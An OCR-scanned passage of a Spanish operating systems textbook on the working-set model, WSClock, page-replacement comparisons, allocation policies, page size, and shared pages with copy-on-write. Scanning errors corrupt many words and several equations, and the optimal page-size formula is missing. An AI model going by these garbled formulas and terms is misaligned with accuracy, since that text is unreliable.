pocos programas utilizarán cada una de las páginas. La figura 3-19 muestra el tamaño del conjun¬ 
to de trabajo como una función de k. 



Figura 3-19. El conjunto de trabajo es el conjunto de páginas utilizadas por las k re¬ 
ferencias a memoria más recientes. La función w(k, t) es el tamaño del conjunto de tra¬ 
bajo en el tiempo t. 


El hecho deque la mayoría délos programas acceden de manera aleatoria a un pequeño núme¬ 
ro de páginas, pero que este conjunto cambia lentamente con el tiempo, explica la rápida elevación 
inicial de la curva y después la lenta elevación para una k grande. Por ejemplo, un programa que 
ejecuta un ciclo que ocupa dos páginas utilizando datos en cuatro páginas podría hacer referencia a 
las seis páginas cada 1000 instrucciones, pero la referencia más reciente a alguna otra página po- 
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dría ser un millón de instrucciones antes, durante la fase de inicialización. Debido a este comporta¬ 
miento asintótico, el contenido del conjunto de trabajo no es sensible al valor elegido de k. Dicho 
en forma distinta, existe un amplio rango de valores k para los cuales el conjunto de trabajo no cam¬ 
bia. Debido a que el conjunto de trabajo varía lentamente con el tiempo, es posible realizar una pre¬ 
dicción razonable en cuanto a qué páginas se necesitarán cuando el programa se reinicie, con base 
en su conjunto de trabajo la última vez que se detuvo. La prepaginación consiste en cargar estas pá¬ 
ginas antes de reanudar el proceso. 

Para implementar el modelo del conjunto de trabajo, es necesario que el sistema operativo lle¬ 
ve la cuenta de cuáles páginas están en el conjunto de trabajo. Tener esta información también nos 
conduce de inmediato a un posible algoritmo de reemplazo de páginas: cuando ocurra un fallo de 
página, hay que buscar una página que no se encuentre en el conjunto de trabajo y desalojarla. Pa¬ 
ra implementar dicho algoritmo se requiere una manera precisa de determinar cuáles páginas están 
en el conjunto de trabajo. Por definición, el conjunto de trabajo es el conjunto de páginas utilizadas en 
las k referencias a memoria más recientes (algunos autores utilizan las k referencias a páginas más 
recientes, pero la elección es arbitraria). Para implementar cualquier algoritmo de conjunto de tra¬ 
bajo se debe elegir por adelantado cierto valor de k. Una vez que se ha seleccionado cierto valor, 
después de cada referencia a memoria, el conjunto de páginas utilizadas por las k referencias a me¬ 
moria más recientes se determina en forma única. 

Desde luego que tener una definición operacional del conjunto de trabajo no significa que ha¬ 
ya una forma eficiente de calcularlo durante la ejecución de un programa. Uno podría imaginar un 
registro de desplazamiento de longitud k, donde cada referencia a memoria desplazará el registro 
una posición a la izquierda e insertará el número de página de referencia más reciente a la derecha. 
El conjunto de todos los k números de página en el registro de desplazamiento sería el conjunto de 
trabajo. En teoría, en un fallo de página, el contenido del registro de desplazamiento se podría ex¬ 
traer y ordenar; las páginas duplicadas entonces pueden ser eliminadas. El resultado sería el con¬ 
junto de trabajo. Sin embargo, el proceso de mantener el registro de desplazamiento y procesarlo en 
un fallo de página sería en extremo costoso, por lo que esta técnica nunca se utiliza. 

E n vez de ello, se utilizan varias aproximaciones. U na de uso común es desecharla idea de con¬ 
tar hacia atrás k referencias de memoria y usar en su defecto el tiempo de ejecución. Por ejemplo, 
en vez de definir el conjunto de trabajo como las páginas utilizadas durante los 10 millones de re¬ 
ferencias a memoria anteriores, podemos definirlo como el conjunto de páginas utilizadas durante 
los últimos 100 milisegundos de tiempo de ejecución. En la práctica, dicha definición es igual de 
conveniente y es mucho más fácil trabajar con ella. Observe que para cada proceso sólo cuenta su 
propio tiempo de ejecución. Así, si un proceso empieza su ejecución en el tiempo T y ha tenido 40 
milisegundos de tiempo de la CPU a un tiempo real de T -r 100 milisegundos, para los fines del 
conjunto de trabajo su tiempo es de 40 mseg. La cantidad de tiempo de la CPU que ha utilizado en 
realidad un proceso desde que empezó se conoce comúnmente como su tiempo virtual actual. Con 
esta aproximación, el conjunto de trabajo de un proceso es el conjunto de páginas a las que se ha 
hecho referencia durante los últimos x segundos de tiempo virtual. 

Ahora veamos un algoritmo de reemplazo de páginas basado en el conjunto de trabajo. La idea 
básica es buscar una página que no esté en el conjunto de trabajo y desalojarla. En la figura 3-20 
vemos una porción de una tabla de páginas para cierta máquina. Ya que sólo las páginas que están 
en memoria se consideran como candidatos para el desalojo, este algoritmo ignora las páginas que 
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no están en la memoria. Cada entrada contiene (ai menos) dos eiementos ciave de información: ei 
tiempo (aproximado) que se utiiizó ia página porúitima vez y ei bitR (referenciada). Ei rectángu- 
io vacío de coior bianco simboiiza ios demás campos que no necesita este aigoritmo, como ei nú¬ 
mero de marco de página, ios bits de protección y ei bit M (modificado). 

I 2204 I Tiempo virtual actual 


Información acerca 
de una página 


Tiempo de 
último uso 


Página referenciada 
durante este pulso ~ 


Página no referenciac^ 
durante este pulso 


Tabla de páginas 



Bit R (referenciada) 


Explora todas las páginas examinando el bit R: 
si(R==1) 

establece el tiempo de último uso al 
tiempo virtual actual 

si (R == o y edad > t) 
elimina esta página 

si (R == o y edad s t) 
recuerda el menor tiempo 


Figura 3-20. El algoritmo del conjunto de trabajo. 


El algoritmo funciona de la siguiente manera. Se supone que el hardware debe establecer los 
bits R y M , como vimos antes. De manera similar, se supone que una interrupción periódica de re¬ 
loj hace que se ejecute software para borrar el bit Referenciada en cada pulso de reloj. En cada fa¬ 
llo de página se explora la tabla de páginas en busca de una página adecuada para desalojarla. 

A medida que se procesa cada entrada, se examina el bit R. Si es 1, el tiempo virtual actual se 
escribe en el campo Tiempo de último uso en la tabla de páginas, indicando que la página estaba en 
uso al momento en que ocurrió el fallo de página. Como se hizo referencia a la página durante el 
pulso de reloj actual, es evidente que está en el conjunto de trabajo y no es candidato para la elimi¬ 
nación (se supone que x abarca varios pulsos de reloj). 

Si R es O, no se ha hecho referencia a la página durante el pulso de reloj actual y puede ser can¬ 
didato para la eliminación. Para ver si debe o no eliminarse, se calcula su edad (el tiempo virtual 
actual menos su Tiempo de último uso) y se compara con x. Si la edad es mayor que x, la página ya 
no se encuentra en el conjunto de trabajo y la nueva página la sustituye. La exploración continúa 
actualizando las entradas restantes. 

No obstante, si R es O pero la edad es menor o igual quex, la página está todavía en el conjunto 
de trabajo. La página se reserva temporalmente, pero se apunta la página con la mayor edad (el me¬ 
nor valor de Tiempo de último uso). Si toda la tabla completa se explora sin encontrar un candidato 
para desalojar, eso significa que todas las páginas están en el conjunto de trabajo. En ese caso, si se 
encontraron una o más páginas con R = O, se desaloja la más antigua. En el peor caso, se ha hecho 
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referencia a todas las páginas durante el pulso de reloj actual (y por ende, todas tienen R = 1), por lo 
que se selecciona una al azar para eliminarla, de preferencia una página limpia, si es que existe. 

3.4.9 EI algoritmo de reemplazo de páginas W SC lock 

Al algoritmo básico del conjunto de trabajo es incómodo ya que exige explorar toda la tabla de pá¬ 
ginas en cada fallo de página hasta localizar un candidato adecuado. Un algoritmo mejorado, basa¬ 
do en el algoritmo de reloj pero que también utiliza la información del conjunto de trabajo, se 
conoce como WSCIock (Carr y Hennessey, 1981). Debido a su simplicidad de implementadón y 
buen rendimiento, es muy utilizado en la práctica. 

La estructura de datos necesaria es una lista circular de marcos de página, como en el algorit¬ 
mo de reloj, mostrada en la figura 3-21(a). Al principio, esta lista está vacía. Cuando se carga la pri¬ 
mera página, se agrega a la lista. A medida que se agregan más páginas, pasan a la lista para formar 
un anillo. Cada entrada contiene el campo Tiempo de último uso del algoritmo básico del conjunto 
de trabajo, así como el bit R (mostrado) y el bit M (no mostrado). 

Al igual que con el algoritmo de reloj, en cada fallo de página se examina primero la página a 
la que apunta la manecilla. Si el bit R es 1, la página se ha utilizado durante el pulso actual, por lo 
que no es candidato ideal para la eliminación. Después el bit R se establece en 0, la manecilla se 
avanza a la siguiente página y se repite el algoritmo para esa página. El estado después de esta 
secuencia de eventos se muestra en la figura 3-21(b). 

Ahora considere lo que ocurre si la página a la que apunta la manecilla tiene R = 0, como se 
muestra en la figura 3-21(c). Si la edad es mayor que x y la página está limpia, significa que no 
se encuentra en el conjunto de trabajo y existe una copia válida en el disco. El marco de página sim¬ 
plemente se reclama y la nueva página se coloca ahí, como se muestra en la figura 3-21(d). Por otro 
lado, si la página está sucia no se puede reclamar de inmediato, ya que no hay una copia válida pre¬ 
sente en el disco. Para evitar una conmutación de procesos, la escritura al disco se planifica pero la 
manecilla avanza y el algoritmo continúa con la siguiente página. Después de todo, podría haber 
una página antigua y limpia más allá de la línea que se pueda utilizar de inmediato. 

En principio, todas las páginas se podrían planificar para la E/S de disco en un ciclo alrededor 
del reloj. Para reducir el tráfico de disco se podría establecer un límite para permitir que se escri¬ 
ban devuelta un máximo de n páginas. Una vez que se llega a este límite, no se planifican nuevas 
escrituras. 

¿Qué ocurre si la manecilla llega otra vez a su punto inicial? Hay dos casos a considerar: 

1. Se ha planificado por lo menos una escritura. 

2. No se han planificado escrituras. 

En el primer caso, la manecilla sólo sigue moviéndose, buscando una página limpia. Como se han 
planificado una o más escrituras, en algún momento se completará alguna escritura y su página se 
marcará como limpia. La primera página limpia que se encuentre se desaloja. Esta página no es ne¬ 
cesariamente la primera escritura planificada, ya que el controlador de disco puede reordenar escri¬ 
turas para poder optimizar el rendimiento del disco. 
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I 2204 I Tiempo virtual actual 


2084|l 


2032 1 


2084 1 





1620|0 


1620|0 


2032 1 


2003 1 


1980 1 


(a) 
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2003 1 


1213 0 


(b) 
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2084|l 


2032 1 


2084 1 





1620|0 


1620|0 


2032 1 


2003 1 


1980 1 


1213 0 


(c) 


2020 1 


2014|0 



2020 1 


2014|0 




Nueva página 


(d) 


Figura 3-21. Operación del algoritmo WSCIock. (a) y (b) dan un ejemplo de lo que 
ocurre cuando R = 1. (c) y (d) dan un ejemplo de cuando R = 0. 


En el segundo caso, todas las páginas están en el conjunto de trabajo, de otra manera se hubie¬ 
ra planificado por lo menos una escritura. Sin información adicional, lo más simple por hacer es re¬ 
clamar cualquier página limpia y usarla. La ubicación de una página limpia podría rastrearse 
durante el barrido. Si no existen páginas limpias, entonces se selecciona la página actual como la 
víctima y se escribe de vuelta al disco. 
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Ahora hemos visto una variedad deaigoritmos de reempiazo de páginas. En esta sección mostrare¬ 
mos un breve resumen de eiios. La iista de aigoritmos descritos se proporciona en ia figura 3-22. 


Algoritmo 

Comentario 

Óptimo 

No se puede implementar, pero es útil como punto de comparación 

NRU (No usadas recientemente) 

Una aproximación muy burda del LRU 

FIFO (primera en entrar, primera en salir) 

Podría descartar páginas importantes 

Segunda oportunidad 

Gran mejora sobre FIFO 

Reloj 

Realista 

LRU (menos usadas recientemente) 

Excelente, pero difícil de implementar con exactitud 

NFU (no utilizadas frecuentemente) 

Aproximación a LRU bastante burda 

Envejecimiento 

Algoritmo eficiente que se aproxima bien a LRU 

Conjunto de trabajo 

Muy costoso de implementar 

WSCIock 

Algoritmo eficientemente bueno 


Figura 3-22. Algoritmos de reemplazo de páginas descritos en el texto. 


El algoritmo óptimo desaloja la página a la que se hará referencia en el futuro más lejano. 
Por desgracia, no hay forma de determinar cuál página es, por lo que en la práctica no se puede 
utilizar este algoritmo. Sin embargo, es útil como punto de comparación para los demás algorit¬ 
mos. 

El algoritmo NRU divide las páginas en cuatro clases dependiendo del estado de los bits R y 
M. Se selecciona una página aleatoria de la clase con menor numeración. Este algoritmo es fácil de 
implementar, pero muy burdo. Existen mejores. 

PIFO lleva la cuenta del orden en el que se cargaron las páginas en memoria al mantenerlas en 
una lista enlazada. Eliminar la página más antigua se vuelve entonces un proceso trivial, pero co¬ 
mo esa página podría estar todavía en uso, PIFO es una mala opción. 

El algoritmo de segunda oportunidad es una modificación de FIFO que comprueba si hay una 
página en uso antes de eliminarla. Si lo está, la página se reserva. Esta modificación mejora de ma¬ 
nera considerable el rendimiento. El algoritmo de reloj es simplemente una implementación distin¬ 
ta del algoritmo de segunda oportunidad. Tiene las mismas propiedades de rendimiento, pero toma 
un poco menos de tiempo para ejecutar el algoritmo. 

LRU es un algoritmo excelente, pero no se puede implementar sin hardware especial. NFU 
es un burdo intento por aproximarse a LRU; sin embargo, el algoritmo de envejecimiento es una 
mucho mejor aproximación a LRU y se puede implementar con eficiencia. Es una buena opción. 

Los últimos dos algoritmos utilizan el conjunto de trabajo. El algoritmo del conjunto de traba¬ 
jo ofrece un rendimiento razonable, pero es un poco costoso de implementar. WSCIock es una va¬ 
riante que no sólo da un buen rendimiento, sino que también es eficiente al implementar. 
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Con todo, los dos mejores algoritmos son el de envejecimiento y WSCIock. Se basan en LRU 
y el conjunto de trabajo, respectivamente. Ambos dan un buen rendimiento en la paginación y pue¬ 
den implementarse con eficiencia. Existen varios algoritmos más, pero estos dos son tal vez los más 
importantes en la práctica. 


3.5 CUESTIONES DE DISEÑO PARA LOS SISTEMAS 
DE PAGINACIÓN 

En las secciones anteriores hemos explicado cómo funciona la paginación y hemos analizado unos 
cuantos de los algoritmos básicos de reemplazo de páginas, además de mostrar cómo modelarlos. 
Pero no basta con conocer la mecánica básica. Para diseñar un sistema hay que saber mucho más 
para hacer que funcione bien. Es como la diferencia que hay entre saber mover las piezas de aje¬ 
drez y ser un buen jugador. En la siguientes secciones anal izaremos otras cuestiones que deben con¬ 
siderar los diseñadores de sistemas operativos para poder obtener un buen rendimiento de un 
sistema de paginación. 

3.5.1 Políticas de asignación local contra las de asignación global 

En las secciones anteriores hemos analizado varios algoritmos para seleccionar una página y susti¬ 
tuirla al ocurrir un fallo. U na cuestión importante asociada con esta elección (que hemos dejado de 
lado cuidadosamente hasta ahora) es cómo se debe asignar la memoria entre los procesos ejecuta¬ 
bles en competencia. 

Dé un vistazo a la figura 3-23(a). En esta figura, tres procesos (A, B y C) componen el conjun¬ 
to de procesos ejecutables. Suponga que A obtiene un fallo de página. ¿Debe el algoritmo de reem¬ 
plazo de páginas tratar de encontrar la página de uso menos reciente, considerando sólo las seis 
páginas que están actualmente asignadas a A o debe considerar todas las páginas en memoria? Si 
sólo examina las páginas asignadas a A, la página con el menor valor de edad es A5, por lo que ob¬ 
tenemos la situación de la figura 3-23(b). 

Por otro lado, si se va a eliminar la página con el menor valor de edad sin importar de quién 
sea, se elegirá la página B3 y obtendremos la situación de la figura 3-23(c). AI algoritmo de la fi¬ 
gura 3-23(b) se le considera de reemplazo de páginas local, mientras que al de la figura 3-23(c), un 
algoritmo global. Los algoritmos locales corresponden de manera efectiva a asignar a cada proce¬ 
so una fracción fija de la memoria. Los algoritmos globales asignan marcos de página de manera 
dinámica entre los procesos ejecutables. Así, el número de marcos de página asignados a cada pro¬ 
ceso varía en el tiempo. 

En general, los algoritmos globales funcionan mejor, en especial cuando el tamaño del conjun¬ 
to de trabajo puede variar durante el tiempo de vida de un proceso. Si se utiliza un algoritmo local 
y el conjunto de trabajo crece, se producirá una sobrepaginación, aun cuando haya muchos marcos 
de página libres. Si el conjunto de trabajo se reduce, los algoritmos locales desperdician memoria. 
Si se utiliza un algoritmo global, el sistema debe decidir en forma continua cuántos marcos de pá¬ 
gina asignar a cada proceso. Una manera es supervisar el tamaño del conjunto de trabajo, según lo 
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C2 

C3 


(c) 


Figura 3-23. Comparación entre el reemplazo de páginas local y el global, (a) Confi¬ 
guración original, (b) Reemplazo de páginas local, (c) Reemplazo de páginas global. 


indicado por los bits de envejecimiento, pero este método no necesariamente evita la sobrepagina¬ 
ción. El conjunto de trabajo puede cambiar de tamaño en microsegundos, mientras que los bits de 
envejecimiento son una medida burda, esparcida a través de varios pulsos de reloj. 

Otro método es tener un algoritmo para asignar marcos de página a los procesos. Una manera 
es determinar periódicamente el número de procesos en ejecución y asignar a cada proceso una par¬ 
te igual. Así, con 12,416 marcos de página disponibles (es decir, que no son del sistema operativo) 
y 10 procesos, cada proceso obtiene 1241 marcos. Los seis restantes pasan a una reserva, para uti¬ 
lizarlos cuando ocurran fallos de página. 

Aunque este método parece equitativo, tiene poco sentido otorgar partes iguales de la memo¬ 
ria a un proceso de 10 KB y un proceso de 300 KB. En vez de ello, se pueden asignar páginas en 
proporción al tamaño total de cada proceso, donde un proceso de 300 K B obtiene 30 veces la asig¬ 
nación de un proceso de 10 K B. Probablemente sea prudente dar a cada proceso cierto número mí¬ 
nimo, de manera que se pueda ejecutar sin importar qué tan pequeño sea. Por ejemplo, en algunas 
máquinas una sola instrucción de dos operandos puede necesitar hasta seis páginas, debido a que la 
misma instrucción, el operando de origen y el operando de destino pueden extenderse a través de 
los límites de las páginas. Con una asignación de sólo cinco páginas, los programas que contengan 
tales instrucciones no se podrán ejecutar. 

Si se utiliza un algoritmo global, es posible empezar cada proceso con cierto número de pági¬ 
nas proporcional al tamaño del proceso, pero la asignación se tiene que actualizar dinámicamente a 
medida que se ejecuten los procesos. Una manera de administrar la asignación es utilizando el al¬ 
goritmo PFF (Page Fault Frequency, Frecuencia de fallo de páginas). Este algoritmo indica cuán¬ 
do se debe incrementar o decrementar la asignación de páginas a un proceso, pero no dice nada 
acerca de cuál página se debe sustituir en un fallo. Sólo controla el tamaño del conjunto de asigna¬ 
ción. 
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Para una clase extensa de algoritmos de reemplazo de páginas, incluyendo LRU, se sabe que la 
proporción de fallos disminuye a medida que se asignan más páginas, como lo describimos anterior¬ 
mente. Ésta es la suposición detrás del algoritmo PEE. Esta propiedad se ilustra en la figura 3-24. 



Figura 3-24. Proporción de fallos de página como una función del número de marcos 
de página asignados. 

M edir la proporción de fallos de página es un proceso simple: sólo se cuenta el número de fallos 
por segundo, posiblemente tomando una media móvil sóbrelos segundos transcurridos también. Una 
manera sencilla de hacer esto es sumar el número de fallos de página durante el segundo inmediata¬ 
mente anterior a la media móvil actual y dividir entredós. La línea punteada marcada como A corres¬ 
ponde a una proporción de fallos de página que es demasiado alta, por lo que el proceso que emitió el 
fallo recibe más marcos de página para reducir la proporción de fallos. La línea punteada marcada co¬ 
mo B corresponde a una proporción de fallos de página tan baja que podemos suponer que el proce¬ 
so tiene demasiada memoria. En este caso se le pueden quitar marcos de página. A sí, el algoritmo PEE 
trata de mantener la proporción de paginación para cada proceso dentro de límites aceptables. 

Es importante recalcar que ciertos algoritmos de reemplazo de páginas pueden funcionar con 
una política de sustitución local o con una global. Por ejemplo, EIEO puede sustituir la página más 
antigua en toda la memoria (algoritmo global) o la más antigua que posea el proceso actual (algo¬ 
ritmo local). De manera similar, el algoritmo LRU o alguna aproximación a éste puede reemplazar 
la página usada menos recientemente en toda la memoria (algoritmo global) o la página menos usa¬ 
da recientemente poseída por el proceso actual (algoritmo local). La elección entre local y global es 
independiente del algoritmo en algunos casos. 

Por otro lado, para los demás algoritmos de sustitución de página, sólo tiene sentido una estra¬ 
tegia local. En especial, los algoritmos del conjunto de trabajo y WSCIock se refieren a un proceso 
específico y deben aplicarse en este contexto. En realidad no hay un conjunto de trabajo para la má¬ 
quina como un todo, y al tratar de usar la unión de todos los conjuntos de trabajo se perdería la pro¬ 
piedad de localidad, y no funcionaría bien. 

3.5.2 C ontrol de carga 

Aun con el mejor algoritmo de reemplazo de páginas y una asignación global óptima de marcos de 
página a los procesos, puede ocurrir que el sistema se sobrepagine. De hecho, cada vez que los con- 
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juntos de trabajo combinados de todos los procesos exceden a la capacidad de la memoria, se pue¬ 
de esperar la sobrepaginación. Un síntoma de esta situación es que el algoritmo PFF indica que al¬ 
gunos procesos necesitan más memoria, pero ningún proceso necesita menos memoria. En este caso 
no hay forma de proporcionar más memoria a esos procesos que la necesitan sin lastimar a algún 
otro proceso. La única solución real es deshacerse temporalmente de algunos procesos. 

Una buena forma de reducir el número de procesos que compiten por la memoria es intercam¬ 
biar algunos de ellos enviándolos al disco y liberar todas las páginas que ellos mantienen. Por ejem¬ 
plo, un proceso puede intercambiarse al discoy sus marcos de página dividirse entre otros procesos 
que están sobrepaginando. Si el sobrepaginado se detiene, el sistema puede operar de esta forma por 
un tiempo. Si no se detiene hay que intercambiar otro proceso y así en lo sucesivo hasta que se de¬ 
tenga el sobrepaginado. Por ende, incluso hasta con la paginación se sigue necesitando el intercam¬ 
bio, sólo que ahora se utiliza para reducir la demanda potencial de memoria, en vez de reclamar 
páginas. 

El proceso de intercambiar procesos para liberar la carga en la memoria es semejante a la pla¬ 
nificación de dos niveles, donde ciertos procesos se colocan en disco y se utiliza un planificador de 
corto plazo para planificar los procesos restantes. Sin duda se pueden combinar las dos ideas don¬ 
de se intercambien, fuera de memoria, sólo los procesos suficientes para hacer que la proporción de 
fallo de páginas sea aceptable. Periódicamente, ciertos procesos se traen del disco y otros se inter¬ 
cambian hacia el mismo. 

Sin embargo, otro factor a considerar es el grado de multiprogramación. Cuando el número de 
procesos en la memoria principal es demasiado bajo, la CPU puede estar inactiva durante largos pe¬ 
riodos. Esta consideración sostiene que no sólo se debe tomar en cuenta el tamaño del proceso y la 
proporción de paginación al decidir qué proceso se debe intercambiar, sino también sus caracterís¬ 
ticas, tal como si está ligado a la CPU o a la E/S, así como las características que tienen los proce¬ 
sos restantes. 

3.5.3 Tamaño de página 

El tamaño de página es un parámetro que a menudo el sistema operativo puede elegir. Incluso si el 
hardware se ha diseñado, por ejemplo, con páginas de 512 bytes, el sistema operativo puede consi¬ 
derar fácilmente los pares de páginas 0 y 1, 2 y 3, 4 y 5, y así en lo sucesivo, como páginas de 
1 KB al asignar siempre dos marcos de página de 512 bytes consecutivos para ellas. 

Para determinar el mejor tamaño de página se requiere balancear varios factores competiti¬ 
vos. Como resultado, no hay un tamaño óptimo en general. Para empezar, hay dos factores que 
están a favor de un tamaño de página pequeño. Un segmento de texto, datos o pila elegido al azar 
no llenará un número integral de páginas. En promedio, la mitad de la página final estará vacía. 
EI espacio adicional en esa página se desperdicia. A este desperdicio se le conoce como fragmen¬ 
tación interna. Con n segmentos en memoria y un tamaño de página de p bytes, se desperdicia¬ 
rán np/2 bytes en fragmentación interna. Este razonamiento está a favor de un tamaño de página 
pequeño. 

Otro argumento para un tamaño de página pequeño se hace aparente si consideramos que un 
programa consiste de ocho fases secuenciales de 4 KB cada una. Con un tamaño de página de 
32 KB, se deben asignar 32 KB al programa todo el tiempo. Con un tamaño de página de 16 KB, 
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sólo necesita 16 KB. Con un tamaño de página de 4 KB o menor, sóio requiere 4 KB en cuaiquier 
instante. En generai, un tamaño de página grande hará que haya una parte más grande no utiiizada 
dei programa que un tamaño de página pequeño. 

Por otro iado, tener páginas pequeñas impiica que ios programas necesitarán muchas páginas, 
io que sugiere ia necesidad de una tabia de páginas grande. Un programa de 32 KB necesita sóio 
cuatro páginas deS KB, pero 64 páginas de 512 bytes. Las transferencias hacia y desde ei disco son 
por io generai de una página a ia vez, y ia mayor parte dei tiempo se debe ai retraso de búsqueda 
y ai retraso rotacionai, por io que para transferir una página pequeña se requiere casi ei mismo tiem¬ 
po que para transferir una página grande. Se podran requerir 64 x 10 mseg para cargar 64 páginas 
de 512 bytes, pero sóio 4 x 12 mseg para cargar cuatro páginas de 8 KB. 

En aigunas máquinas, ia tabia de páginas se debe cargar en registros de hardware cada vez que 
ia CPU cambia de un proceso a otro. En estas máquinas, tener un tamaño pequeño de página signi¬ 
fica que ei tiempo requerido para cargar sus registros aumenta a medida que se hace más pequeña. 
Además, ei espacio ocupado por ia tabia de páginas aumenta a medida que se reduce ei tamaño de 
ias páginas. 

Esteúitimo punto se puede anai i zar matemáticamente. Digamos que ei tamaño promedio de un 
proceso es de s bytes y que ei tamaño de página es de p bytes. Además supone que cada entrada de 
página requiere e bytes. Ei número aproximado de páginas necesarias por proceso es entonces s/p, 
ocupando se/p bytes de espacio en ia tabia de páginas. La memoria desperdiciada en ia úitima pá¬ 
gina dei proceso debido a ia fragmentación interna es p/2. Así, ia sobrecarga totai debido a ia tabia 
de páginas y a ia pérdida por fragmentación interna se obtiene mediante ia suma de estos dos tér¬ 
minos: 


sobrecarga = se/p -i- p/2 

Ei primer término (tamaño de ia tabia de páginas) es grande cuando ei tamaño de página es peque¬ 
ño. Ei segundo término (fragmentación interna) es grande cuando ei tamaño de página es grande. Ei 
vaior óptimo debe estar entre estos dos. Ai sacar ia primera derivada con respecto a p e iguaiaria a 
cero, obtenemos ia ecuación 


-se/p^ -f 1/2 = 0 

De esta ecuación podemos derivar una fórmuia que proporcione ei tamaño de página óptimo (conside¬ 
rando sóio ia memoria gastada en ia fragmentación y ei tamaño de ia tabia de páginas). Ei resuitado es: 

p = 

Para s = lMBye = 8 bytes por cada entrada en ia tabia de páginas, ei tamaño de página óptimo 
esde4 KB. Las computadoras disponibies en forma comerciai han utiiizado tamaños de página que 
varían desde 512 bytes hasta 64 KB. Un vaior común soiía ser 1 KB, pero hoy en día es más co¬ 
mún tener 4 K B u 8 KB. A medida que ias memorias aumentan su tamaño, ei tamaño de página tien¬ 
de a crecer también (pero no en forma iineai). Cuadrupiicar ei tamaño de ia RAM rara vez dupiica 
siquiera ei tamaño de página. 
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3.5.4 E spacios separados de instrucciones y de datos 

La mayor parte de las computadoras tienen un solo espacio de direcciones que contiene tanto pro¬ 
gramas como datos, como se muestra en la figura 3-25(a). Si este espacio de direcciones es lo bas¬ 
tante grande, todo funciona bien. No obstante, a menudo es demasiado pequeño, lo cual obliga a los 
programadores a pararse de cabeza tratando de ajustar todo en el espacio de direcciones. 


Un solo espacio 




Espacio D 


} Página no 
usada 


■ Datos 


(a) (b) 

Figura 3-25. (a) U n espacio de direcciones, (b) Espacios I y D separados. 


Una solución utilizada por primera vez en la PDP-11 (de 16 bits) es tener espacios de direccio¬ 
nes separados para las instrucciones (texto del programa) y los datos, IIamados espacio I y espacio 
D, respectivamente, como se muestra en la figura 3-25(b). Cada espacio de direcciones empieza 
desde 0 hasta cierto valor máximo, por lo general de 2^® - 1 o de 2^^ - 1. El enlazador debe saber 
cuándo se utilizan espacios I y D separados, ya que cuando esto ocurre los datos se reubican a la di¬ 
rección virtual 0, en vez de empezar después del programa. 

En una computadora con este diseño, ambos espacios de direcciones se pueden paginar de ma¬ 
nera independiente. Cada uno tiene su propia tabla de páginas, con su propia asignación de páginas 
virtuales a marcos de páginas físicas. Cuando el hardware desea obtener una instrucción, sabe que 
debe utilizar el espacio I y la tabla de páginas de este espacio. De manera similar, las referencias a 
los datos deben pasar a través de la tabla de páginas del espacio D. Aparte de esta distinción, tener 
espacios I y D separados no introduce ninguna complicación especial y sí duplica el espacio de di¬ 
recciones disponible. 


3.5.5 Páginas compartidas 

otra cuestión de diseño es la compartición. En un sistema de multiprogramación grande, es común 
que varios usuarios ejecuten el mismo programa a la vez. Evidentemente es más eficiente compar¬ 
tir las páginas para evitar tener dos copias de la misma página en memoria al mismo tiempo. Un 
problema es que no todas las páginas se pueden compartir. En especial, sólo pueden compartírselas 
páginas que son de sólo lectura como el texto del programa, pero las páginas de datos no. 

Si se admiten espacios I y D separados, es relativamente simple compartir los programas al ha¬ 
cer que dos o más procesos utilicen la misma tabla de páginas para su espacio I pero distintas 
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tablas de páginas para sus espacios D. Por io generai en una impiementación que soporta ia com¬ 
partición de esta forma, ias tabias de páginas son estructuras de datos independientes de ia tabia de 
procesos. Entonces, cada proceso tiene dos apuntadores en su tabia de procesos: uno para ia tabia 
de páginas dei espacio I y otro para ia tabia de páginas dei espacio D, como se muestra en ia figu¬ 
ra 3-26. Cuando ei pianificador seiecciona un proceso para ejecutado, utiiiza estos apuntadores pa¬ 
ra iocaiizar ias tabias de páginas apropiadas y estabiece ia MMU para que ios utiiice. Aun sin 
espacios I y D separados, ios procesos pueden compartir programas (o aigunas veces bibiiotecas) 
pero ei mecanismo es más compiicado. 



Figura 3-26. Dos procesos comparten el mismo programa compartiendo su tabla de 
páginas. 

Cuando dos o más procesos comparten cierto código, ocurre un probiema con ias páginas com¬ 
partidas. Suponga que ios procesos A y B están ejecutando ei editor y comparten sus páginas. Si ei 
pianificador decide eiiminar A de ia memoria, desaiojando todas sus páginas y iienando ios marcos 
de página vacíos con otro programa, causará que B genere un gran número de faiios de página pa¬ 
ra traed as de vueita. 

De manera simiiar, cuando A termina, es esenciai poder descubrir que ias páginas aún están en 
uso, de manera que su espacio en ei disco no se iibere por accidente. Buscar en todas ias tabias de 
páginas para ver si una página es compartida, frecuentemente es muy caro, por io que se necesitan 
estructuras de datos especiaies para iievar ia cuenta de ias páginas compartidas, en especiai si ia uni¬ 
dad de compartición es ia página individuai (o serie de páginas) en vez de toda una tabia de pági¬ 
nas compieta. 

Compartir datos es más compiicado que compartir código, pero no imposibie. En especiai, en 
UNIX después de una llamada al sistema fork, el padre y el hijo tienen que compartir tanto el tex- 
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to del programa como el texto de los datos. En un sistema paginado, io que se hace a menudo es 
dar a cada uno de estos procesos su propia tabia de páginas y hacer que ambos apunten ai mismo 
conjunto de páginas. Así, no se reaiiza una copia de páginas ai momento de ia operación fonk. Sin 
embargo, todas ias págiñas de datos son asociadas en ambos procesos de SÓ LO L ECTU RA (REA D 
ONLY). 

M ientras que ambos procesos sóio iean sus datos, sin modificados, esta situación puede conti¬ 
nuar. Tan pronto como cuaiquiera de ios procesos actuaiiza una paiabra de memoria, ia vioiación de 
ia protección de sóio iectura produce un trap ai sistema operativo. Después se hace una copia de ia 
página ofensora, para que cada proceso tenga ahora su propia copia privada. A mbas copias se esta- 
biecen ahora como LECTURA-ESCRITURA (READ-WRITE), para que las siguientes operacio¬ 
nes de escritura en cualquiera de las copias continúen sin lanzar un trap. Esta estrategia significa 
que aquellas páginas que nunca se modifican (incluyendo todas las del programa) no se necesitan 
copiar. Este método, conocido como copiar en escritura, mejora el rendimiento al reducir el co¬ 
piado. 


3.5.6 Bibliotecas compartidas 

L a compartición se puede realizar en otros elementos además de las páginas individuales. Si un pro¬ 
grama se inicia dos veces, la mayor parte de los sistemas operativos compartirán de manera auto¬ 
mática todas las páginas de texto, quedando sólo una copia en la memoria. Las páginas de texto 
siempre son de sólo lectura, por lo que aquí no hay problema. Dependiendo del sistema operativo, 
cada proceso puede obtener su propia copia privada de las páginas de datos o se pueden compartir 
y marcar como de sólo lectura. Si cualquier proceso modifica una página de datos, se realizará una 
copia privada para éste, esto es, se aplicará la copia en escritura. 

En los sistemas modernos hay muchas bibliotecas extensas utilizadas por muchos procesos, por 
